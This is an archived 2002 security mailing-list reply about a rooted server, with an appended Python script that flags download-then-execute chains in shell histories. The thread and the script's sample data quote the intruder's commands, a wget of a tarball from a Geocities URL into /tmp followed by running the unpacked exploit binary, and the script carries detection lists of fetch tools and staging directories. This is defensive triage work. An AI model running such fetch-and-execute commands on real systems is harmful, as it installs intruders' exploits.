Security Incidents mailing list archives

Re: Rooted, .haos on system


From: Carlos Eduardo Pedroza Santiviago <segfault () brturbo com>
Date: Mon, 16 Dec 2002 18:31:03 -0200

On Mon, 16 Dec 2002 13:47:28 -0500
Damian Gerow <damian () sentex net> wrote:

> On Mon, 2002-12-16 at 12:38, Damian Gerow wrote:
> > On Thu, 2002-12-12 at 18:50, Damian Gerow wrote:
> > > I've just received word that one of our customers was rooted, and he's
> > > asking about the file ".haos".  Nothing rings any bells, has anyone heard
> > > of it?
> >
> > Just a quick update to this...
>
> And one last tidbit...
>
> Left in the .bash_history was this:
>
>         w
>         cd /tmp
>         wget www.geocities.com/Lebadash/loc.tgz; tar xvzf loc.tgz
>         ./epc
>
> A quick check tells me that 'epc' is a backdoor utility, and the other
> file contained within loc.tgz looks like a trojaned 'su'.

No, for me this looks like:
        epc -> ptrace local exploit
        su -> su local exploit

They're old shit, and I guess your system wasn't updated.


> I've already notified Geocities abuse, and haven't heard back from them
> yet.


Good luck,

-- 
Carlos Eduardo Pedroza Santiviago -- <segfault@*NO_SPAM*brturbo.com>
Key id/fp = 4B5EB579/A817 71A3 AA78 1997 65DA  0665 A341 D4A4 4B5E B579
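The chain quoted above (cd into /tmp, wget a tarball, unpack it, run the binary that came out of it) is the classic fetch-and-run pattern a responder looks for when triaging a shell history. The script below is an added example written for this page, not code from the thread or from either poster: it walks a .bash_history in order and flags local binaries executed from a world-writable staging directory after a network fetch. The sample history is constructed for the example (its first four commands are the ones quoted in the thread, the rest are filler), and the list of fetch tools and staging directories is an assumption you would extend for your own hosts. It also assumes a plain one-command-per-line history file; timestamps (HISTTIMEFORMAT) are not handled.

```python
"""Triage helper: flag download-then-execute chains in a shell history.

Added example for this thread, not code posted by any participant.
Assumes a plain .bash_history (one command per line; ';', '&&' and '||'
chains are split). Tool and directory lists are assumptions, extend them.
"""
import re
from typing import Dict, List

# Constructed sample: the first four commands are those quoted in the
# thread, the remaining lines are filler added for the example.
SAMPLE_HISTORY = """\
w
cd /tmp
wget www.geocities.com/Lebadash/loc.tgz; tar xvzf loc.tgz
./epc
ls -la
./su
cd /home/user
./configure
"""

# Assumed lists; tune for the hosts you triage.
FETCH_RE = re.compile(r"^(?:wget|curl|ftp|fetch|lynx|tftp)\b")
UNPACK_RE = re.compile(r"^(?:tar|gunzip|unzip|bunzip2)\b")
LOCAL_EXEC_RE = re.compile(r"^\./([^\s;|&]+)")
STAGING_DIRS = ("/tmp", "/var/tmp", "/dev/shm")


def split_commands(history: str) -> List[str]:
    """Return one command per element, splitting ';', '&&' and '||' chains."""
    out: List[str] = []
    for line in history.splitlines():
        for part in re.split(r"\s*(?:;|&&|\|\|)\s*", line.strip()):
            if part:
                out.append(part)
    return out


def triage_history(history: str) -> Dict[str, List[str]]:
    """Walk the history in order; report fetched URLs, every ./binary run,
    and findings for binaries run from a staging dir after a fetch there."""
    cwd = "?"
    armed = False          # a fetch happened while cwd was a staging dir
    fetched: List[str] = []
    executed: List[str] = []
    findings: List[str] = []
    for cmd in split_commands(history):
        if cmd.startswith("cd "):
            cwd = cmd.split(None, 1)[1]
            if cwd not in STAGING_DIRS:
                armed = False  # leaving the staging dir ends the chain
            continue
        if FETCH_RE.match(cmd):
            fetched.append(cmd.split()[-1])   # URL is normally the last token
            armed = cwd in STAGING_DIRS
            continue
        if UNPACK_RE.match(cmd):
            continue                           # unpacking keeps the chain armed
        m = LOCAL_EXEC_RE.match(cmd)
        if m:
            executed.append(m.group(1))
            if armed:
                findings.append(
                    f"{cwd}/{m.group(1)} executed after fetch of {fetched[-1]}"
                )
    return {"fetched": fetched, "executed": executed, "findings": findings}


if __name__ == "__main__":
    for key, values in triage_history(SAMPLE_HISTORY).items():
        print(key)
        for v in values:
            print("   ", v)
```

Run it against a copy of the history file pulled off the compromised box rather than the live one; a .bash_history is written only when the shell exits and is trivially editable, so treat what it shows as a lead to confirm against file timestamps and the tarball's contents, not as a complete record.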
